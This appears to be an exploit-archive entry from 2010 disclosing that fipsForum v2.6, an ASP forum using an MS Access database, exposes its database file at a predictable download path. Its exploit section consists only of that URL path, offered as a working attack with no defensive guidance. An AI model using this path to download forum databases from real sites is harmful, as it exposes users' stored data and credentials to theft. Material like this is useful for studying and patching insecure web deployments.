id: 10797
date: 02/09/2010
title: fipsForum v2.6 Remote Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

=======================================================
fipsForum v2.6 Remote Database Disclosure Vulnerability
=======================================================

        [»] fipsForum v2.6 Remote Database Disclosure Vulnerability
==============================================================================
 
    [»] Script:             [ fipsForum ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
    [»] Founder:          [ ViRuSMaN ] 
###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/_database/forumFips.mdb



#  0day.today [2023-03-25]  #